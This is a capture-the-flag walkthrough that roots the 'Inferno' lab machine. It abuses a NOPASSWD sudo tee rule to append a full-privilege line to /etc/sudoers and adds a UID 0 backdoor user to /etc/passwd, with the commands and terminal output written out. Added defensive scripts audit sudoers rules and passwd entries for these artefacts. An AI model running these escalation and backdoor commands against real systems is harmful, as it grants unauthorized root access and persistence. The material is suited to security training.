Let's proceed step by step to achieve Privilege Escalation:


Method 1. Sudo Misconfiguration Exploiting Specific Binary

We will explore the options one by one. Our objective is to escalate privileges by modifying the user's permissions in the sudoers file.

Here is the command:

dante@Inferno:~$ echo "dante ALL=(ALL) NOPASSWD:ALL" | sudo tee -a "/etc/sudoers"

Where,

  • The echo command prints the specified text. Here, it produces the new line for the sudoers file that grants privileges to the user "dante".
  • The vertical bar symbol (|) is called a pipe. It is used to pass the output of the echo command as input to the next command, sudo tee.
  • sudo tee -a "/etc/sudoers": the tee command reads from standard input and writes to standard output and files simultaneously. Run through sudo, it writes to the file as root.
  • The -a option is used to append the input to the specified file rather than overwriting it.

dante ALL=(ALL) NOPASSWD:ALL 
dante@Inferno:~$

When you run the entire command, it will add this line to the "/etc/sudoers" file, giving the user "dante" the ability to run any command with sudo privileges without being prompted for a password. However, it is essential to be cautious when modifying the "/etc/sudoers" file, as any mistakes could lead to system instability or security issues.

After successfully executing the command, you can verify the changes using the following command: "sudo -l".

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:                                                                                  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                       
                             
User dante may run the following commands on Inferno:                                                                            
    (root) NOPASSWD: /usr/bin/tee   
    (ALL) NOPASSWD: ALL      
dante@Inferno:~$

As you can see, the user "dante" can now run any command through sudo without a password, which amounts to root permission.
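The root cause here is a sudoers rule that looks narrow but grants arbitrary file writes as root. The check below is an added example, not part of the original walkthrough or of sudo itself: it parses sudoers user specifications and flags entries that give root-level file writes or unrestricted commands. The sample file is constructed (the tee rule is written in sudoers form to match the "sudo -l" listing above, and the "backup" account and its log path are hypothetical), and the list of file-writing binaries is a small illustrative subset.

```python
import re
from pathlib import PurePosixPath
from typing import NamedTuple

# Illustrative subset of binaries that can write a caller-chosen file;
# GTFOBins keeps a much fuller catalogue.
FILE_WRITERS = {"tee", "cp", "dd", "mv", "sed", "vi", "vim", "nano"}

TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=]+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("#", "@include", "Defaults", "User_Alias", "Runas_Alias",
                 "Host_Alias", "Cmnd_Alias")

# Constructed sample sudoers content.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
dante   ALL=(root) NOPASSWD: /usr/bin/tee
backup  ALL=(root) NOPASSWD: /usr/bin/tee /var/log/backup.log
dante ALL=(ALL) NOPASSWD:ALL
"""


class Finding(NamedTuple):
    who: str
    command: str
    nopasswd: bool
    reason: str


def classify(command):
    """Return why a sudoers command entry is dangerous, or None if it is not flagged."""
    if command == "ALL":
        return "unrestricted command execution"
    parts = command.split()
    if not parts:
        return None
    name = PurePosixPath(parts[0]).name
    args = parts[1:]
    # In sudoers, a command listed without arguments may be run with ANY
    # arguments; fixed arguments pin the invocation unless they hold wildcards.
    if name in FILE_WRITERS and (not args or any("*" in a for a in args)):
        return f"{name} can write arbitrary files, including /etc/sudoers"
    return None


def audit_sudoers(text):
    """Flag user specifications that hand out root-equivalent access.
    Simplified parser: no alias expansion, no line continuations, no escaped commas."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m or m["who"] == "root":
            continue
        runas_users = (m["runas"] or "root").split(":")[0]   # drop the group part
        if not any(u.strip() in ("root", "ALL") for u in runas_users.split(",")):
            continue
        nopasswd = False                     # tags carry over to later commands
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            while (tag := TAG_RE.match(cmd)):
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                cmd = cmd[tag.end():]
            reason = classify(cmd)
            if reason:
                findings.append(Finding(m["who"], cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The "backup" rule is not flagged because its argument list is fixed, which is the form a rule like this should take when a service account really does need tee.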

Now that the user "dante" has root permission, let's access the root flag. To do this, change the current directory to the "/root" directory.

dante@Inferno:~$ cd /root
-bash: cd: /root: Permission denied                                                                                              
dante@Inferno:~$

However, you might encounter a "permission denied" error. To gain superuser permission, type "sudo su".

dante@Inferno:~$ sudo su     
root@Inferno:/home/dante#

Once you have gained superuser privileges, change the directory again, and now you can access the root directory.

Let's check if there is a root flag file in the root directory by using the "ls" command.

root@Inferno:/home/dante# cd /root                                                                                               
root@Inferno:~# ls           
proof.txt                    
root@Inferno:~#

Once you've located the root flag file, you can view its contents using the ` cat ` command.

root@Inferno:~# cat proof.txt


 (        )  (          (        )     )   
 )\ )  ( /(  )\ )       )\ )  ( /(  ( /(   
(()/(  )\())(()/(  (   (()/(  )\()) )\())  
 /(_))((_)\  /(_)) )\   /(_))((_)\ ((_)\   
(_))   _((_)(_))_|((_) (_))   _((_)  ((_)  
|_ _| | \| || |_  | __|| _ \ | \| | / _ \  
 | |  | .` || __| | _| |   / | .` || (_) | 
|___| |_|\_||_|   |___||_|_\ |_|\_| \___/ 


Congrats!

You've rooted Inferno!

77f6f3c544ec0811e2d1243e2e0d1835

mindsflee

https://www.buymeacoffe.com/mindsflee

root@Inferno:~# 

Now, we have successfully gained the root flag.
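Seen from the defender's side, the ` sudo -l ` output above is exactly what a privilege audit should flag. The following shell function is an added example, not part of the original walkthrough; the list of write-capable binaries and the severity labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag risky rules in `sudo -l` output.
# WRITE_CAPABLE is an assumed, non-exhaustive list of binaries that can write files.
WRITE_CAPABLE="tee cp mv dd install sed vi vim nano"

audit_sudo_rules() {
    # Reads `sudo -l` output on stdin and prints one finding per risky command.
    awk -v bins="$WRITE_CAPABLE" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    /^[ \t]*\(/ {                                  # rule lines start with "(runas)"
        line = $0
        sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
        nopass = (line ~ /NOPASSWD:/) ? " without a password" : ""
        cmds = line
        sub(/^\([^)]*\)[ \t]*/, "", cmds)          # drop the (runas) part
        gsub(/[A-Z_]+:[ \t]*/, "", cmds)           # drop tags such as NOPASSWD:
        m = split(cmds, c, /,[ \t]*/)              # one entry per allowed command
        for (j = 1; j <= m; j++) {
            split(c[j], w, " ")                    # w[1] is the binary, rest are args
            k = split(w[1], p, "/")
            if (w[1] == "ALL")
                print "CRITICAL unrestricted sudo" nopass ": " line
            else if (k > 0 && (p[k] in risky))
                print "HIGH " p[k] " can write root-owned files" nopass ": " line
        }
    }'
}

sample_sudo_l() {
    # Rule lines copied from the `sudo -l` output shown above; Defaults line shortened.
    cat <<'EOF'
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (ALL) NOPASSWD: ALL
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a real host, pipe ` sudo -l -U <user> ` (run as root) into ` audit_sudo_rules ` for each account that appears in the sudoers configuration.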


Method 2. Adding a New User with Root Privileges

Let's explore the second method, which involves adding a new user to the target system: 

To do this, we'll use the openssl command line tool to generate an encrypted password for the new user.

1. First, we'll display the contents of the " /etc/passwd " file by typing " cat " followed by the file path. 

dante@Inferno:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
dante:x:1000:1000:dante,,,:/home/dante:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dante@Inferno:~$

2. Next, we'll copy the structure of the "root" entry and paste it into a text editor. Replace the "x" in the password field with a dollar sign followed by brackets, and inside the brackets put the command " openssl passwd -6 -salt <user_name> <password> ", so that the shell inserts the generated hash in that position:

technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash

Where, 

  1. The "-6" flag indicates an SHA-512 hash
  2. The "-salt" flag adds salt to the hash for security
  3. Instead of " root ," we'll use the new username for the user that we want to create. 

After that, we'll add the " tee " command to save the changes to the " /etc/passwd " file:

echo "technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash" | sudo tee -a "/etc/passwd"

Finally, we'll copy the newly generated command, and paste the entire command into the terminal to add the new user.

dante@Inferno:~$ echo "technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash" | sudo tee -a "/etc/passwd"
technoscience:$6$technoscience$HzTWWWguPL9gyLn4ipfSLtsDt2YX1lYs67r3aJG04rvoVa31N9.FWB37gyEbTn1jGQkzTZ4C/kJLc5D0awgs1/:0:0:technoscience:/root:/bin/bash       
dante@Inferno:~$

Now, we can switch to the newly created user by running the " su " command:

dante@Inferno:~$ su technoscience
Password:                    
root@Inferno:/home/dante#

As you can see, we have successfully gained root privilege: the prompt shows root because the new account was created with UID 0.
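Method 2 leaves two artefacts in " /etc/passwd " that an integrity check can pick up: a second account with UID 0, and a password hash in the second field where " x " normally points to the shadow file. The audit function below is an added example, not part of the original walkthrough; the sample file is constructed, its hash is a placeholder, and the severity labels are this example's own.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a passwd-format file for the
# artefacts Method 2 leaves behind. Severity labels are this example's own.
audit_passwd() {
    # $1: passwd-format file to check (defaults to /etc/passwd)
    awk -F: '
    /^[ \t]*(#|$)/ { next }                        # skip comments and blank lines
    NF != 7 { print "WARN line " NR ": expected 7 fields, found " NF; next }
    $3 ~ /^0+$/ && $1 != "root" { print "CRITICAL " $1 ": UID 0 account other than root" }
    $2 ~ /^\$/ { print "HIGH " $1 ": password hash stored in passwd, not shadow" }
    $2 == ""   { print "HIGH " $1 ": empty password field" }
    ' "${1:-/etc/passwd}"
}

sample_passwd() {
    # Constructed sample modelled on the entries above; the hash is a placeholder.
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
dante:x:1000:1000:dante,,,:/home/dante:/bin/bash
technoscience:$6$technoscience$PLACEHOLDERHASH:0:0:technoscience:/root:/bin/bash
EOF
}

tmp=$(mktemp)
sample_passwd > "$tmp"
audit_passwd "$tmp"
rm -f "$tmp"
```

Called without an argument, ` audit_passwd ` checks the live " /etc/passwd "; on a clean system it prints nothing.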

If you have any questions or doubts, feel free to leave a comment in the comment section below. I'll be happy to help and address any inquiries you may have.
